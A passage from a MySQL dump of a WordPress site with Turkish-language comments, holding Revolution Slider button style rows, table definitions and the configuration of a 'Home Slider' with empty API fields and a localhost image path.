'{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(102, '.tp-caption.WebProduct-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(103, '.tp-caption.Restaurant-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}');
INSERT INTO `zdenl_revslider_css` (`id`, `handle`, `settings`, `hover`, `advanced`, `params`) VALUES
(104, '.tp-caption.Gym-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(105, '.tp-caption.Gym-Button-Light', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power2.easeInOut\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(106, '.tp-caption.Sports-Button-Light', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(107, '.tp-caption.Sports-Button-Red', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(108, '.tp-caption.Photography-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}', '{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(109, '.tp-caption.Newspaper-Button-2', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_revslider_layer_animations`
--

CREATE TABLE `zdenl_revslider_layer_animations` (
  `id` int(9) NOT NULL,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_revslider_navigations`
--

CREATE TABLE `zdenl_revslider_navigations` (
  `id` int(9) NOT NULL,
  `name` varchar(191) NOT NULL,
  `handle` varchar(191) NOT NULL,
  `css` longtext NOT NULL,
  `markup` longtext NOT NULL,
  `settings` longtext
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_revslider_sliders`
--

CREATE TABLE `zdenl_revslider_sliders` (
  `id` int(9) NOT NULL,
  `title` tinytext NOT NULL,
  `alias` tinytext,
  `params` longtext NOT NULL,
  `settings` text,
  `type` varchar(191) NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Tablo döküm verisi `zdenl_revslider_sliders`
--

INSERT INTO `zdenl_revslider_sliders` (`id`, `title`, `alias`, `params`, `settings`, `type`) VALUES
(1, 'Home Slider', 'home', '{\"hero_active\":\"-1\",\"source_type\":\"gallery\",\"instagram-count\":\"\",\"instagram-transient\":\"1200\",\"instagram-type\":\"user\",\"instagram-user-id\":\"\",\"flickr-count\":\"\",\"flickr-transient\":\"1200\",\"flickr-api-key\":\"\",\"flickr-type\":\"publicphotos\",\"flickr-user-url\":\"\",\"flickr-photoset\":\"\",\"flickr-photoset-select\":\"\",\"flickr-gallery-url\":\"\",\"flickr-group-url\":\"\",\"facebook-count\":\"\",\"facebook-transient\":\"1200\",\"facebook-page-url\":\"\",\"facebook-type-source\":\"album\",\"facebook-album\":\"\",\"facebook-album-select\":\"\",\"facebook-app-id\":\"\",\"facebook-app-secret\":\"\",\"twitter-count\":\"\",\"twitter-transient\":\"1200\",\"twitter-user-id\":\"\",\"twitter-image-only\":\"off\",\"twitter-include-retweets\":\"off\",\"twitter-exclude-replies\":\"off\",\"twitter-consumer-key\":\"\",\"twitter-consumer-secret\":\"\",\"twitter-access-token\":\"\",\"twitter-access-secret\":\"\",\"youtube-count\":\"\",\"youtube-transient\":\"1200\",\"youtube-api\":\"\",\"youtube-channel-id\":\"\",\"youtube-type-source\":\"channel\",\"youtube-playlist\":\"\",\"youtube-playlist-select\":\"\",\"vimeo-count\":\"\",\"vimeo-transient\":\"1200\",\"vimeo-type-source\":\"user\",\"vimeo-username\":\"\",\"vimeo-groupname\":\"\",\"vimeo-albumid\":\"\",\"vimeo-channelname\":\"\",\"product_types\":\"product\",\"product_category\":\"\",\"posts_list\":\"\",\"fetch_type\":\"cat_tag\",\"post_types\":\"post\",\"post_category\":\"category_2\",\"product_sortby\":\"ID\",\"product_sort_direction\":\"DESC\",\"max_slider_products\":\"30\",\"excerpt_limit_product\":\"55\",\"reg_price_from\":\"\",\"reg_price_to\":\"\",\"sale_price_from\":\"\",\"sale_price_to\":\"\",\"instock_only\":\"off\",\"featured_only\":\"off\",\"post_sortby\":\"ID\",\"posts_sort_direction\":\"DESC\",\"max_slider_posts\":\"30\",\"excerpt_limit\":\"55\",\"title\":\"Home Slider\",\"alias\":\"home\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home\\\\\\\"]\",\"slider-type\":\"standard\",\"slider_type\":\"auto\",\"width\":\"1200\",\"height\":\"500\",\"width_notebook\":\"1200\",\"height_notebook\":\"500\",\"enable_custom_size_notebook\":\"on\",\"width_tablet\":\"778\",\"height_tablet\":\"960\",\"enable_custom_size_tablet\":\"off\",\"width_mobile\":\"600\",\"height_mobile\":\"350\",\"enable_custom_size_iphone\":\"off\",\"full_screen_align_force\":\"off\",\"fullscreen_min_height\":\"\",\"autowidth_force\":\"off\",\"fullscreen_offset_container\":\"\",\"fullscreen_offset_size\":\"\",\"main_overflow_hidden\":\"on\",\"auto_height\":\"off\",\"min_height\":\"0\",\"max_width\":\"\",\"force_full_width\":\"off\",\"next_slide_on_window_focus\":\"off\",\"disable_focus_listener\":\"off\",\"def-layer_selection\":\"off\",\"slider_id\":\"\",\"delay\":\"8000\",\"start_js_after_delay\":\"0\",\"def-slide_transition\":\"fade\",\"def-transition_duration\":\"300\",\"def-image_source_type\":\"full\",\"def-background_fit\":\"cover\",\"def-bg_fit_x\":\"100\",\"def-bg_fit_y\":\"100\",\"def-bg_position\":\"center center\",\"def-bg_position_x\":\"0\",\"def-bg_position_y\":\"0\",\"def-bg_repeat\":\"no-repeat\",\"def-kenburn_effect\":\"off\",\"def-kb_start_fit\":\"100\",\"def-kb_easing\":\"Linear.easeNone\",\"def-kb_end_fit\":\"100\",\"def-kb_start_offset_x\":\"0\",\"def-kb_start_offset_y\":\"0\",\"def-kb_end_offset_x\":\"0\",\"def-kb_end_offset_y\":\"0\",\"def-kb_start_rotate\":\"0\",\"def-kb_end_rotate\":\"0\",\"def-kb_duration\":\"10000\",\"0\":\"blank\",\"start_with_slide_enable\":\"off\",\"start_with_slide\":\"1\",\"first_transition_active\":\"off\",\"first_transition_type\":\"fade\",\"first_transition_duration\":\"300\",\"first_transition_slot_amount\":\"7\",\"stop_on_hover\":\"on\",\"stop_slider\":\"off\",\"stop_after_loops\":\"0\",\"stop_at_slide\":\"2\",\"shuffle\":\"off\",\"loop_slide\":\"off\",\"label_viewport\":\"off\",\"viewport_start\":\"wait\",\"viewport_area\":\"80\",\"label_presetheight\":\"off\",\"waitforinit\":\"off\",\"enable_progressbar\":\"off\",\"show_timerbar\":\"top\",\"progress_height\":\"4\",\"progress_opa\":\"10\",\"progressbar_color\":\"#000000\",\"disable_on_mobile\":\"off\",\"disable_kenburns_on_mobile\":\"on\",\"hide_slider_under\":\"0\",\"hide_defined_layers_under\":\"0\",\"hide_all_layers_under\":\"0\",\"shadow_type\":\"0\",\"background_dotted_overlay\":\"none\",\"background_color\":\"\",\"padding\":\"0\",\"show_background_image\":\"off\",\"background_image\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"bg_fit\":\"cover\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center top\",\"position\":\"center\",\"margin_top\":\"0\",\"margin_bottom\":\"0\",\"margin_left\":\"0\",\"margin_right\":\"0\",\"use_spinner\":\"2\",\"spinner_color\":\"#ffffff\",\"enable_arrows\":\"on\",\"rtl_arrows\":\"off\",\"navigation_arrow_style\":\"custom\",\"navigation_arrows_preset\":\"default\",\"arrows_always_on\":\"true\",\"hide_arrows\":\"300\",\"hide_arrows_mobile\":\"300\",\"hide_arrows_on_mobile\":\"on\",\"arrows_under_hidden\":\"1281\",\"hide_arrows_over\":\"off\",\"arrows_over_hidden\":\"0\",\"leftarrow_align_hor\":\"left\",\"leftarrow_align_vert\":\"center\",\"leftarrow_offset_hor\":\"20\",\"leftarrow_offset_vert\":\"0\",\"leftarrow_position\":\"slider\",\"rightarrow_align_hor\":\"right\",\"rightarrow_align_vert\":\"center\",\"rightarrow_offset_hor\":\"20\",\"rightarrow_offset_vert\":\"0\",\"rightarrow_position\":\"slider\",\"enable_bullets\":\"off\",\"rtl_bullets\":\"off\",\"navigation_bullets_style\":\"custom\",\"navigation_bullets_preset\":\"default\",\"bullets_space\":\"5\",\"bullets_direction\":\"horizontal\",\"bullets_always_on\":\"true\",\"hide_bullets\":\"300\",\"hide_bullets_mobile\":\"300\",\"hide_bullets_on_mobile\":\"on\",\"bullets_under_hidden\":\"900\",\"hide_bullets_over\":\"off\",\"bullets_over_hidden\":\"900\",\"bullets_align_hor\":\"center\",\"bullets_align_vert\":\"bottom\",\"bullets_offset_hor\":\"0\",\"bullets_offset_vert\":\"20\",\"bullets_position\":\"slider\",\"enable_thumbnails\":\"off\",\"rtl_thumbnails\":\"off\",\"thumbnails_padding\":\"5\",\"span_thumbnails_wrapper\":\"off\",\"thumbnails_wrapper_color\":\"transparent\",\"thumbnails_wrapper_opacity\":\"100\",\"thumbnails_style\":\"round\",\"navigation_thumbs_preset\":\"default\",\"ph-round-thumbs-title-font-size-custom-def\":\"off\",\"ph-round-thumbs-title-font-size-custom\":\"12\",\"ph-round-thumbs-title-color-color-rgba-def\":\"off\",\"ph-round-thumbs-title-color-color-rgba\":\"#ffffff\",\"ph-round-thumbs-title-bg-color-rgba-def\":\"off\",\"ph-round-thumbs-title-bg-color-rgba\":\"rgba(0,0,0,0.85)\",\"thumb_amount\":\"5\",\"thumbnails_space\":\"5\",\"thumbnail_direction\":\"horizontal\",\"thumb_width\":\"100\",\"thumb_height\":\"50\",\"thumb_width_min\":\"100\",\"thumbs_always_on\":\"false\",\"hide_thumbs\":\"200\",\"hide_thumbs_mobile\":\"1200\",\"hide_thumbs_on_mobile\":\"on\",\"thumbs_under_hidden\":\"0\",\"hide_thumbs_over\":\"off\",\"thumbs_over_hidden\":\"0\",\"thumbnails_inner_outer\":\"inner\",\"thumbnails_align_hor\":\"center\",\"thumbnails_align_vert\":\"bottom\",\"thumbnails_offset_hor\":\"0\",\"thumbnails_offset_vert\":\"10\",\"thumbnails_position\":\"slider\",\"enable_tabs\":\"off\",\"rtl_tabs\":\"off\",\"tabs_padding\":\"5\",\"span_tabs_wrapper\":\"off\",\"tabs_wrapper_color\":\"transparent\",\"tabs_wrapper_opacity\":\"5\",\"tabs_style\":\"round\",\"navigation_tabs_preset\":\"default\",\"ph-round-tabs-param2-size-custom-def\":\"off\",\"ph-round-tabs-param2-size-custom\":\"14\",\"ph-round-tabs-param2-color-color-rgba-def\":\"off\",\"ph-round-tabs-param2-color-color-rgba\":\"0,0,0,0\",\"ph-round-tabs-contentcolor-color-rgba-def\":\"off\",\"ph-round-tabs-contentcolor-color-rgba\":\"#333333\",\"ph-round-tabs-bgcolor-color-rgba-def\":\"off\",\"ph-round-tabs-bgcolor-color-rgba\":\"rgba(0,0,0,0)\",\"ph-round-tabs-hover-bg-color-color-rgba-def\":\"off\",\"ph-round-tabs-hover-bg-color-color-rgba\":\"#eeeeee\",\"ph-round-tabs-param1-size-custom-def\":\"off\",\"ph-round-tabs-param1-size-custom\":\"12\",\"ph-round-tabs-param1-color-color-rgba-def\":\"off\",\"ph-round-tabs-param1-color-color-rgba\":\"rgba(51,51,51,0.5)\",\"ph-round-tabs-image-size-custom-def\":\"off\",\"ph-round-tabs-image-size-custom\":\"60\",\"ph-round-tabs-border-size-custom-def\":\"off\",\"ph-round-tabs-border-size-custom\":\"1\",\"ph-round-tabs-border-color-color-rgba-def\":\"off\",\"ph-round-tabs-border-color-color-rgba\":\"#e5e5e5\",\"ph-round-tabs-font-family-font_family-def\":\"off\",\"ph-round-tabs-font-family-font_family\":\"Roboto\",\"tabs_amount\":\"5\",\"tabs_space\":\"5\",\"tabs_direction\":\"horizontal\",\"tabs_width\":\"100\",\"tabs_height\":\"50\",\"tabs_width_min\":\"100\",\"tabs_always_on\":\"false\",\"hide_tabs\":\"200\",\"hide_tabs_mobile\":\"1200\",\"hide_tabs_on_mobile\":\"off\",\"tabs_under_hidden\":\"0\",\"hide_tabs_over\":\"off\",\"tabs_over_hidden\":\"0\",\"tabs_inner_outer\":\"inner\",\"tabs_align_hor\":\"center\",\"tabs_align_vert\":\"bottom\",\"tabs_offset_hor\":\"0\",\"tabs_offset_vert\":\"20\",\"tabs_position\":\"slider\",\"touchenabled\":\"on\",\"drag_block_vertical\":\"off\",\"swipe_velocity\":\"75\",\"swipe_min_touches\":\"1\",\"swipe_direction\":\"horizontal\",\"keyboard_navigation\":\"off\",\"keyboard_direction\":\"horizontal\",\"mousescroll_navigation\":\"off\",\"mousescroll_navigation_reverse\":\"default\",\"previewimage_width\":\"150\",\"previewimage_height\":\"150\",\"carousel_infinity\":\"off\",\"carousel_space\":\"0\",\"carousel_borderr\":\"0\",\"carousel_borderr_unit\":\"px\",\"carousel_padding_top\":\"0\",\"carousel_padding_bottom\":\"0\",\"carousel_maxitems\":\"3\",\"carousel_stretch\":\"off\",\"showalllayers_carousel\":\"off\",\"carousel_easing\":\"Power3.easeInOut\",\"carousel_speed\":\"800\",\"carousel_fadeout\":\"on\",\"carousel_varyfade\":\"off\",\"carousel_rotation\":\"off\",\"carousel_varyrotate\":\"off\",\"carousel_maxrotation\":\"0\",\"carousel_scale\":\"off\",\"carousel_varyscale\":\"off\",\"carousel_scaledown\":\"50\",\"carousel_hposition\":\"center\",\"carousel_vposition\":\"center\",\"use_parallax\":\"on\",\"disable_parallax_mobile\":\"on\",\"ddd_parallax\":\"off\",\"ddd_parallax_shadow\":\"off\",\"ddd_parallax_bgfreeze\":\"off\",\"ddd_parallax_overflow\":\"off\",\"ddd_parallax_layer_overflow\":\"off\",\"ddd_parallax_zcorrection\":\"65\",\"parallax_type\":\"scroll\",\"parallax_origo\":\"enterpoint\",\"parallax_speed\":\"400\",\"parallax_level_16\":\"55\",\"parallax_level_1\":\"5\",\"parallax_level_2\":\"40\",\"parallax_level_3\":\"15\",\"parallax_level_4\":\"50\",\"parallax_level_5\":\"25\",\"parallax_level_6\":\"60\",\"parallax_level_7\":\"35\",\"parallax_level_8\":\"70\",\"parallax_level_9\":\"45\",\"parallax_level_10\":\"80\",\"parallax_level_11\":\"47\",\"parallax_level_12\":\"48\",\"parallax_level_13\":\"49\",\"parallax_level_14\":\"50\",\"parallax_level_15\":\"51\",\"fade_scrolleffect\":\"on\",\"blur_scrolleffect\":\"off\",\"grayscale_scrolleffect\":\"off\",\"scrolleffect_maxblur\":\"10\",\"scrolleffect_bg\":\"off\",\"scrolleffect_layers\":\"off\",\"scrolleffect_parallax_layers\":\"on\",\"scrolleffect_static_layers\":\"off\",\"scrolleffect_static_parallax_layers\":\"off\",\"scrolleffect_direction\":\"both\",\"scrolleffect_tilt\":\"5\",\"scrolleffect_multiplicator\":\"1.3\",\"scrolleffect_multiplicator_layers\":\"1.3\",\"scrolleffect_off_mobile\":\"on\",\"lazy_load_type\":\"none\",\"simplify_ie8_ios4\":\"off\",\"show_alternative_type\":\"off\",\"show_alternate_image\":\"\",\"ignore_height_changes\":\"off\",\"ignore_height_changes_px\":\"0\",\"jquery_noconflict\":\"on\",\"js_to_body\":\"false\",\"output_type\":\"none\",\"jquery_debugmode\":\"off\",\"custom_css\":\"\",\"custom_javascript\":\"\",\"version\":\"\"}', '{\"version\":\"5.0.7\"}', '');

-- --------------------------------------------------------

--
